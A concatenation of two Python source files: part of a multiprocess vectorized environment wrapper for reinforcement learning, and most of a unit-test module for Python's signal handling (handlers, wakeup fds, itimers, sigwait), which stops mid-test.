observation_space = None,
action_space = None,
):
self.venv = venv
VecEnv.__init__(
self,
num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space,
)
self.class_attributes = dict(inspect.getmembers(self.__class__))
def step_async(self, actions: np.ndarray) -> None:
self.venv.step_async(actions)
@abstractmethod
def reset(self) -> VecEnvObs:
pass
@abstractmethod
def step_wait(self) -> VecEnvStepReturn:
pass
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
return self.venv.seed(seed)
def close(self) -> None:
return self.venv.close()
def render(self, mode: str = "human") -> Optional[np.ndarray]:
return self.venv.render(mode=mode)
def get_images(self) -> Sequence[np.ndarray]:
return self.venv.get_images()
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
return self.venv.get_attr(attr_name, indices)
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
return self.venv.set_attr(attr_name, value, indices)
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
return self.venv.env_method(method_name, *method_args, indices=indices, **method_kwargs)
def env_is_wrapped(self, wrapper_class: 'Type[gym.Wrapper]', indices: VecEnvIndices = None) -> List[bool]:
return self.venv.env_is_wrapped(wrapper_class, indices=indices)
def __getattr__(self, name: str) -> Any:
"""Find attribute from wrapped venv(s) if this wrapper does not have it.
Useful for accessing attributes from venvs which are wrapped with multiple wrappers
which have unique attributes of interest.
"""
blocked_class = self.getattr_depth_check(name, already_found=False)
if blocked_class is not None:
own_class = f"{type(self).__module__}.{type(self).__name__}"
error_str = (
f"Error: Recursive attribute lookup for {name} from {own_class} is "
"ambiguous and hides attribute from {blocked_class}"
)
raise AttributeError(error_str)
return self.getattr_recursive(name)
def _get_all_attributes(self) -> Dict[str, Any]:
"""Get all (inherited) instance and class attributes
:return: all_attributes
"""
all_attributes = self.__dict__.copy()
all_attributes.update(self.class_attributes)
return all_attributes
def getattr_recursive(self, name: str) -> Any:
"""Recursively check wrappers to find attribute.
:param name: name of attribute to look for
:return: attribute
"""
all_attributes = self._get_all_attributes()
if name in all_attributes: # attribute is present in this wrapper
attr = getattr(self, name)
elif hasattr(self.venv, "getattr_recursive"):
# Attribute not present, child is wrapper. Call getattr_recursive rather than getattr
# to avoid a duplicate call to getattr_depth_check.
attr = self.venv.getattr_recursive(name)
else: # attribute not present, child is an unwrapped VecEnv
attr = getattr(self.venv, name)
return attr
def getattr_depth_check(self, name: str, already_found: bool) -> str:
"""See base class.
:return: name of module whose attribute is being shadowed, if any.
"""
all_attributes = self._get_all_attributes()
if name in all_attributes and already_found:
# this venv's attribute is being hidden because of a higher venv.
shadowed_wrapper_class = f"{type(self).__module__}.{type(self).__name__}"
elif name in all_attributes and not already_found:
# we have found the first reference to the attribute. Now check for duplicates.
shadowed_wrapper_class = self.venv.getattr_depth_check(name, True)
else:
# this wrapper does not have the attribute. Keep searching.
shadowed_wrapper_class = self.venv.getattr_depth_check(name, already_found)
return shadowed_wrapper_class
class CloudpickleWrapper:
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
:param var: the variable you wish to wrap for pickling with cloudpickle
"""
def __init__(self, var: Any):
self.var = var
def __getstate__(self) -> Any:
return cloudpickle.dumps(self.var)
def __setstate__(self, var: Any) -> None:
self.var = cloudpickle.loads(var)
def _worker(
remote: 'mp.connection.Connection', parent_remote: 'mp.connection.Connection', env_fn_wrapper: CloudpickleWrapper
) -> None:
# Import here to avoid a circular import
# from stable_baselines3.common.env_util import is_wrapped
parent_remote.close()
env = env_fn_wrapper.var()
needs_reset = False
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
# if cmd == "step":
# if needs_reset:
# needs_reset = False
# time_step = env.reset()
# else:
# time_step = env.step(data)
# if time_step.last():
# needs_reset = True
# remote.send(time_step)
# elif cmd == "seed":
# remote.send(env.seed(data))
# elif cmd == "reset":
# needs_reset = False
# time_step = env.reset()
# remote.send(time_step)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
# elif cmd == "is_wrapped":
# remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self,
env_fns: List[Callable[[], 'gym.Env']],
start_method: Optional[str] = None,
norm_obs: bool = False
):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = mp.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space, norm_obs)
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
# dones = np.stack([o.step_type.last() for o in obs])
# obs, rews, dones, infos = zip(*results)
# return _flatten_obs(results, self.observation_space), np.stack([o.reward for o in results]), np.stack([o.step_type.last() for o in results])
obs, rews, dones, infos = zip(*results)
return self.normalize_obs(np.stack(obs)), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
# return _flatten_obs(obs, self.observation_space)
return np.stack(obs)
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self, wrapper_class: 'Type[gym.Wrapper]', indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]], space: 'gym.spaces.Space') -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
# assert isinstance(obs, (list, TimeStep)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
return OrderedDict([(k, np.stack([o.observation[k] for o in obs])) for k in space.keys()])
|
test_signal.py
|
import unittest
from test import support
from contextlib import closing
import enum
import gc
import pickle
import select
import signal
import struct
import subprocess
import traceback
import sys, os, time, errno
from test.script_helper import assert_python_ok, spawn_python
try:
import threading
except ImportError:
threading = None
class HandlerBCalled(Exception):
pass
def exit_subprocess():
"""Use os._exit(0) to exit the current subprocess.
Otherwise, the test catches the SystemExit and continues executing
in parallel with the original test, so you wind up with an
exponential number of tests running concurrently.
"""
os._exit(0)
def ignoring_eintr(__func, *args, **kwargs):
try:
return __func(*args, **kwargs)
except OSError as e:
if e.errno != errno.EINTR:
raise
return None
class GenericTests(unittest.TestCase):
@unittest.skipIf(threading is None, "test needs threading module")
def test_enums(self):
for name in dir(signal):
sig = getattr(signal, name)
if name in {'SIG_DFL', 'SIG_IGN'}:
self.assertIsInstance(sig, signal.Handlers)
elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}:
self.assertIsInstance(sig, signal.Sigmasks)
elif name.startswith('SIG') and not name.startswith('SIG_'):
self.assertIsInstance(sig, signal.Signals)
elif name.startswith('CTRL_'):
self.assertIsInstance(sig, signal.Signals)
self.assertEqual(sys.platform, "win32")
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class InterProcessSignalTests(unittest.TestCase):
MAX_DURATION = 20 # Entire test should last at most 20 sec.
def setUp(self):
self.using_gc = gc.isenabled()
gc.disable()
def tearDown(self):
if self.using_gc:
gc.enable()
def format_frame(self, frame, limit=None):
return ''.join(traceback.format_stack(frame, limit=limit))
def handlerA(self, signum, frame):
self.a_called = True
def handlerB(self, signum, frame):
self.b_called = True
raise HandlerBCalled(signum, self.format_frame(frame))
def wait(self, child):
"""Wait for child to finish, ignoring EINTR."""
while True:
try:
child.wait()
return
except OSError as e:
if e.errno != errno.EINTR:
raise
def run_test(self):
# Install handlers. This function runs in a sub-process, so we
# don't worry about re-setting the default handlers.
signal.signal(signal.SIGHUP, self.handlerA)
signal.signal(signal.SIGUSR1, self.handlerB)
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
signal.signal(signal.SIGALRM, signal.default_int_handler)
# Variables the signals will modify:
self.a_called = False
self.b_called = False
# Let the sub-processes know who to send signals to.
pid = os.getpid()
child = ignoring_eintr(subprocess.Popen, ['kill', '-HUP', str(pid)])
if child:
self.wait(child)
if not self.a_called:
time.sleep(1) # Give the signal time to be delivered.
self.assertTrue(self.a_called)
self.assertFalse(self.b_called)
self.a_called = False
# Make sure the signal isn't delivered while the previous
# Popen object is being destroyed, because __del__ swallows
# exceptions.
del child
try:
child = subprocess.Popen(['kill', '-USR1', str(pid)])
# This wait should be interrupted by the signal's exception.
self.wait(child)
time.sleep(1) # Give the signal time to be delivered.
self.fail('HandlerBCalled exception not raised')
except HandlerBCalled:
self.assertTrue(self.b_called)
self.assertFalse(self.a_called)
child = ignoring_eintr(subprocess.Popen, ['kill', '-USR2', str(pid)])
if child:
self.wait(child) # Nothing should happen.
try:
signal.alarm(1)
# The race condition in pause doesn't matter in this case,
# since alarm is going to raise a KeyboardException, which
# will skip the call.
signal.pause()
# But if another signal arrives before the alarm, pause
# may return early.
time.sleep(1)
except KeyboardInterrupt:
pass
except:
self.fail("Some other exception woke us from pause: %s" %
traceback.format_exc())
else:
self.fail("pause returned of its own accord, and the signal"
" didn't arrive after another second.")
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'inter process signals not reliable (do not mix well with threading) '
'on freebsd6')
def test_main(self):
# This function spawns a child process to insulate the main
# test-running process from all the signals. It then
# communicates with that child process over a pipe and
# re-raises information about any exceptions the child
# raises. The real work happens in self.run_test().
os_done_r, os_done_w = os.pipe()
with closing(os.fdopen(os_done_r, 'rb')) as done_r, \
closing(os.fdopen(os_done_w, 'wb')) as done_w:
child = os.fork()
if child == 0:
# In the child process; run the test and report results
# through the pipe.
try:
done_r.close()
# Have to close done_w again here because
# exit_subprocess() will skip the enclosing with block.
with closing(done_w):
try:
self.run_test()
except:
pickle.dump(traceback.format_exc(), done_w)
else:
pickle.dump(None, done_w)
except:
print('Uh oh, raised from pickle.')
traceback.print_exc()
finally:
exit_subprocess()
done_w.close()
# Block for up to MAX_DURATION seconds for the test to finish.
r, w, x = select.select([done_r], [], [], self.MAX_DURATION)
if done_r in r:
tb = pickle.load(done_r)
if tb:
self.fail(tb)
else:
os.kill(child, signal.SIGKILL)
self.fail('Test deadlocked after %d seconds.' %
self.MAX_DURATION)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class PosixTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertIsInstance(hup, signal.Handlers)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
checked = set()
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows.
# Issue #18396, only for signals without a C-level handler.
if signal.getsignal(sig) is not None:
signal.signal(sig, signal.signal(sig, handler))
checked.add(sig)
# Issue #18396: Ensure the above loop at least tested *something*
self.assertTrue(checked)
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
class WakeupFDTests(unittest.TestCase):
def test_invalid_fd(self):
fd = support.make_bad_fd()
self.assertRaises(ValueError, signal.set_wakeup_fd, fd)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
def check_wakeup(self, test_body, *signals, ordered=True):
# use a subprocess to have only one thread
code = """if 1:
import fcntl
import os
import signal
import struct
signals = {!r}
def handler(signum, frame):
pass
def check_signum(signals):
data = os.read(read, len(signals)+1)
raised = struct.unpack('%uB' % len(data), data)
if not {!r}:
raised = set(raised)
signals = set(signals)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
for fd in (read, write):
flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
signal.set_wakeup_fd(write)
test()
check_signum(signals)
os.close(read)
os.close(write)
""".format(tuple(map(int, signals)), ordered, test_body)
assert_python_ok('-c', code)
def test_wakeup_write_error(self):
# Issue #16105: write() errors in the C signal handler should not
# pass silently.
# Use a subprocess to have only one thread.
code = """if 1:
import errno
import fcntl
import os
import signal
import sys
import time
from test.support import captured_stderr
def handler(signum, frame):
1/0
signal.signal(signal.SIGALRM, handler)
r, w = os.pipe()
flags = fcntl.fcntl(r, fcntl.F_GETFL, 0)
fcntl.fcntl(r, fcntl.F_SETFL, flags | os.O_NONBLOCK)
# Set wakeup_fd a read-only file descriptor to trigger the error
signal.set_wakeup_fd(r)
try:
with captured_stderr() as err:
signal.alarm(1)
time.sleep(5.0)
except ZeroDivisionError:
# An ignored exception should have been printed out on stderr
err = err.getvalue()
if ('Exception ignored when trying to write to the signal wakeup fd'
not in err):
raise AssertionError(err)
if ('OSError: [Errno %d]' % errno.EBADF) not in err:
raise AssertionError(err)
else:
raise AssertionError("ZeroDivisionError not raised")
"""
r, w = os.pipe()
try:
os.write(r, b'x')
except OSError:
pass
else:
self.skipTest("OS doesn't report write() error on the read end of a pipe")
finally:
os.close(r)
os.close(w)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the sleep,
# before select is called
time.sleep(TIMEOUT_FULL)
mid_time = time.time()
dt = mid_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.time()
dt = after_time - mid_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except OSError:
pass
else:
raise Exception("OSError not raised")
after_time = time.time()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_signum(self):
self.check_wakeup("""def test():
signal.signal(signal.SIGUSR1, handler)
os.kill(os.getpid(), signal.SIGUSR1)
os.kill(os.getpid(), signal.SIGALRM)
""", signal.SIGUSR1, signal.SIGALRM)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pending(self):
self.check_wakeup("""def test():
signum1 = signal.SIGUSR1
signum2 = signal.SIGUSR2
signal.signal(signum1, handler)
signal.signal(signum2, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2))
os.kill(os.getpid(), signum1)
os.kill(os.getpid(), signum2)
# Unblocking the 2 signals calls the C signal handler twice
signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2))
""", signal.SIGUSR1, signal.SIGUSR2, ordered=False)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
pass
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except OSError as err:
if err.errno != errno.EINTR:
raise
else:
sys.exit(2)
sys.exit(3)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
stdout, stderr = process.communicate(timeout=5.0)
except subprocess.TimeoutExpired:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %r"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
self.hndl_count += 1
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('freebsd6', 'netbsd5'),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'itimer not reliable (does not mix well with threading) on freebsd6')
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
class PendingSignalsTests(unittest.TestCase):
"""
Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait()
functions.
"""
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending_empty(self):
self.assertEqual(signal.sigpending(), set())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending(self):
code = """if 1:
import os
import signal
def handler(signum, frame):
1/0
signum = signal.SIGUSR1
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
os.kill(os.getpid(), signum)
pending = signal.sigpending()
for sig in pending:
assert isinstance(sig, signal.Signals), repr(pending)
if pending != {signum}:
raise Exception('%s != {%s}' % (pending, signum))
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill(self):
code = """if 1:
import signal
import threading
import sys
signum = signal.SIGUSR1
def handler(signum, frame):
1/0
signal.signal(signum, handler)
if sys.platform == 'freebsd6':
# Issue #12392 and #12469: send a signal to the main thread
# doesn't work before the creation of the first thread on
# FreeBSD 6
def noop():
pass
thread = threading.Thread(target=noop)
thread.start()
thread.join()
tid = threading.get_ident()
try:
signal.pthread_kill(tid, signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def wait_helper(self, blocked, test):
"""
test: body of the "def test(signum):" function.
blocked: number of the blocked signal
"""
code = '''if 1:
import signal
import sys
from signal import Signals
def handler(signum, frame):
1/0
%s
blocked = %s
signum = signal.SIGALRM
# child: block and wait the signal
try:
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [blocked])
# Do the tests
test(signum)
# The handler must not be called on unblock
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked])
except ZeroDivisionError:
print("the signal handler has been called",
file=sys.stderr)
sys.exit(1)
except BaseException as err:
print("error: {}".format(err), file=sys.stderr)
sys.stderr.flush()
sys.exit(1)
''' % (test.strip(), blocked)
# sig*wait* must be called with the signal blocked: since the current
# process might have several threads running, use a subprocess to have
# a single thread.
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
def test_sigwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
received = signal.sigwait([signum])
assert isinstance(received, signal.Signals), received
if received != signum:
raise Exception('received %s, not %s' % (received, signum))
''')
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
def test_sigwaitinfo(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigwaitinfo([signum])
if info.si_signo != signum:
raise Exception("info.si_signo != %s" % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigtimedwait([signum], 10.1000)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_poll(self):
# check that polling with sigtimedwait works
self.wait_helper(signal.SIGALRM, '''
def test(signum):
import os
os.kill(os.getpid(), signum)
info = signal.sigtimedwait([signum], 0)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_timeout(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
received = signal.sigtimedwait([signum], 1.0)
if received is not None:
raise Exception("received=%r" % (received,))
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_negative_timeout(self):
signum = signal.SIGALRM
self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0)
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
# Issue #18238: sigwaitinfo() can be interrupted on Linux (raises
# InterruptedError), but not on AIX
@unittest.skipIf(sys.platform.startswith("aix"),
'signal.sigwaitinfo() cannot be interrupted on AIX')
def test_sigwaitinfo_interrupted(self):
self.wait_helper(signal.SIGUSR1, '''
def test(signum):
import errno
hndl_called = True
def alarm_handler(signum, frame):
hndl_called = False
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(1)
try:
signal.sigwaitinfo([signal.SIGUSR1])
except OSError as e:
if e.errno == errno.EINTR:
if not hndl_called:
raise Exception("SIGALRM handler not called")
else:
raise Exception("Expected EINTR to be raised by sigwaitinfo")
else:
raise Exception("Expected EINTR to be raised by sigwaitinfo")
''')
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipIf(threading is None, "test needs threading module")
def test_sigwait_thread(self):
# Check that calling sigwait() from a thread doesn't suspend the whole
